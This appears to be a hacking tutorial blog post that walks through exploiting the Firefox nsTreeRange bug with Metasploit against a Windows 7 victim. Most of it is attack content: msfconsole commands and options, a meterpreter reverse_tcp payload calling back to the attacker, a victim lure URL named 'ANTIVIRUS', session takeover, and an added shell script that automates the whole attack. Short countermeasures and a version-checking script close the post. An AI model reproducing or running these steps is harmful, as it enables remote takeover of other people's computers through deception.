Today while surfing I read some news about the nsTreeRange vulnerability in Mozilla Firefox 3.5 through the 3.6.x releases. The Metasploit module for it is ranked Normal rather than Good or Excellent. Metasploit's entry for it, by sinn3r, is dated 2011-07-10. In this tutorial I'm using Windows 7 as the victim operating system with Mozilla Firefox 3.5.17. If you want to try this tutorial yourself, the Firefox version mentioned above can be found at oldapps.com.
Requirements:
1. A Windows 7 victim running Mozilla Firefox 3.5.17
2. Linux OS or BackTrack 5 (Metasploit is already included in this distro)
1. First, open msfconsole and run use exploit/windows/browser/mozilla_nstreerange. If it reports that the exploit cannot be found, update the framework first by running msfupdate.
msf > use exploit/windows/browser/mozilla_nstreerange
msf exploit(mozilla_nstreerange) > show options

Module options (exploit/windows/browser/mozilla_nstreerange):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CreateThread  true             yes       Whether to execute the payload in a new thread
   SEHProlog     true             yes       Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL for incoming connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion    SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                        no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Auto (Direct attack against Windows XP, otherwise through Java, if enabled)
2. A few options need to be set before launching the exploit. Note the target line in the output above: on Windows XP the module attacks Firefox directly, while on any other Windows version, including the Windows 7 victim used here, it goes through Java, so the Java plugin must be enabled in the victim's browser for the attack to work.
SRVHOST : your IP address; this is the exploit server the victim will connect to.
SRVPORT : the port on which the server receives the victim's request. The default is 8080, but if port 80 is free on your machine it is better to use it, so the URL you send does not need a :8080 suffix.
URIPATH : the path part of the URL, i.e. http://www.hacking-tutorial.com/URIPATH. The default is a random string; you can set it to something more human-readable, e.g. http://www.hacking-tutorial.com/ANTIVIRUS.
In the picture above I also set the payload to windows/meterpreter/reverse_tcp, which additionally needs LHOST set to your IP address so the victim can connect back; you can choose whichever payload suits you best 🙂
3. Once everything is set up correctly, run exploit to start our malicious web server.
4. After the victim opens the URL we sent them, the server handles the request and the exploit spawns a new notepad.exe process on the victim's computer. The screenshot is below.
5. A new session (ID 1) has been created. Next we interact with that session to take control of the victim's computer:
sessions -i 1
That's it, we're inside the victim's computer. 🙂
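To make steps 1 to 5 repeatable, here is a small POSIX shell script that writes the whole configuration as a Metasploit resource file and hands it to msfconsole. This is an added example, not the original post's or the Metasploit project's code. The attacker address 192.168.56.101, the port 80, the path ANTIVIRUS and the listener port 4444 are assumed lab values; the module name and the option names come from the show options output above, and the payload is the windows/meterpreter/reverse_tcp used in the walkthrough.

```shell
#!/bin/sh
# Added example: build a msfconsole resource script for the
# mozilla_nstreerange walkthrough. Lab values (192.168.56.101, port 80,
# /ANTIVIRUS, LPORT 4444) are assumptions, not from the original post.
# Remember that on anything but Windows XP the module goes through Java,
# so the victim's Firefox must have the Java plugin enabled.

# Print the resource script to stdout.
# $1 attacker IP (used for SRVHOST and LHOST), $2 SRVPORT, $3 URIPATH, $4 LPORT
build_rc() {
    ip="$1"; srvport="$2"; uripath="$3"; lport="$4"
    # 0.0.0.0 is fine as a listen address, but reverse_tcp needs a real
    # LHOST the victim can reach, so insist on a concrete address.
    case "$ip" in
        0.0.0.0|"") echo "build_rc: need a concrete attacker IP" >&2; return 1 ;;
    esac
    # Both ports must be numeric and within 1-65535.
    for p in "$srvport" "$lport"; do
        case "$p" in
            ''|*[!0-9]*) echo "build_rc: port '$p' is not numeric" >&2; return 1 ;;
        esac
        [ "$p" -ge 1 ] && [ "$p" -le 65535 ] || { echo "build_rc: port '$p' out of range" >&2; return 1; }
    done
    # Normalise URIPATH to exactly one leading slash.
    uripath="/${uripath#/}"
    cat <<EOF
use exploit/windows/browser/mozilla_nstreerange
set SRVHOST $ip
set SRVPORT $srvport
set URIPATH $uripath
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ip
set LPORT $lport
exploit -j -z
EOF
}

# Write the script to a file and, if msfconsole is installed, start it.
# The -j -z flags run the exploit as a background job without auto-interacting,
# so msfconsole stays usable for "sessions -i 1" once the victim connects.
run_lab() {
    rc="${1:-/tmp/nstreerange.rc}"
    build_rc 192.168.56.101 80 ANTIVIRUS 4444 > "$rc" || return 1
    echo "resource script written to $rc; send the victim http://192.168.56.101/ANTIVIRUS"
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc"
    fi
}

# Run as: sh nstreerange.sh --write [/path/to/file.rc]
if [ "${1:-}" = "--write" ]; then
    run_lab "${2:-/tmp/nstreerange.rc}"
fi
```

Run the script with --write to produce the file; the checks in build_rc catch the two mistakes that most often leave the listener silent, a wildcard LHOST and a mistyped port.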
– Always update Mozilla Firefox to the latest version.
– Disable the Java plugin in the browser if you do not need it; as the module's target description shows, the attack on anything other than Windows XP depends on it.
– Use a personal firewall to monitor inbound and outbound traffic.
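To act on the first countermeasure you need to know whether an installed Firefox actually falls in the affected range, and comparing version strings as text gets this wrong ("3.5.9" sorts after "3.5.17"). The POSIX shell script below is an added example, not part of the original post: it converts a version to a number before comparing and reads the version out of "firefox --version" style banners. It assumes the fix shipped in Firefox 3.5.19 and 3.6.17, so 3.5.0 to 3.5.18 and 3.6.0 to 3.6.16 are treated as affected; confirm those boundaries against Mozilla's advisory before relying on them, and the sample banners at the bottom are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): decide whether a Firefox
# version falls in the range hit by the nsTreeRange bug.
# Assumption: the fix shipped in 3.5.19 and 3.6.17, so 3.5.0-3.5.18 and
# 3.6.0-3.6.16 are treated as affected.

# Turn "a.b.c" into one comparable integer, e.g. 3.5.17 -> 3005017.
# Plain string comparison would rank "3.5.9" above "3.5.17".
vernum() {
    echo "$1" | awk -F. '{ printf "%d\n", $1*1000000 + $2*1000 + $3 }'
}

# Usage: firefox_affected VERSION
# Exit 0 if the version is affected, 1 if not, 2 if it cannot be parsed.
firefox_affected() {
    v="$1"
    case "$v" in
        [0-9]*.[0-9]*.[0-9]*) ;;
        [0-9]*.[0-9]*) v="$v.0" ;;      # "3.6" means 3.6.0
        *) return 2 ;;
    esac
    n=$(vernum "$v")
    # 3.5.0 <= v < 3.5.19  or  3.6.0 <= v < 3.6.17
    if [ "$n" -ge "$(vernum 3.5.0)" ] && [ "$n" -lt "$(vernum 3.5.19)" ]; then
        return 0
    fi
    if [ "$n" -ge "$(vernum 3.6.0)" ] && [ "$n" -lt "$(vernum 3.6.17)" ]; then
        return 0
    fi
    return 1
}

# Usage: check_banner "Mozilla Firefox 3.5.17"
# Extracts the version from a "firefox --version" banner and reports.
# Exit 0 if affected, 1 if not, 2 if no version was found.
check_banner() {
    ver=$(printf '%s\n' "$1" | sed -n 's/.*Firefox \([0-9][0-9.]*\).*/\1/p')
    [ -n "$ver" ] || { echo "no version found in: $1" >&2; return 2; }
    if firefox_affected "$ver"; then
        echo "Firefox $ver: affected, upgrade"
        return 0
    else
        echo "Firefox $ver: not in the affected range"
        return 1
    fi
}

# Constructed sample banners for a stand-alone run; on a real host use
#   check_banner "$(firefox --version)"
for banner in "Mozilla Firefox 3.5.17" "Mozilla Firefox 3.6.17" "Mozilla Firefox 3.6.9"; do
    check_banner "$banner" || true
done
```

On a real machine feed it the output of firefox --version; on Windows the same string is in the application.ini file next to firefox.exe.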
Hope you found it useful 🙂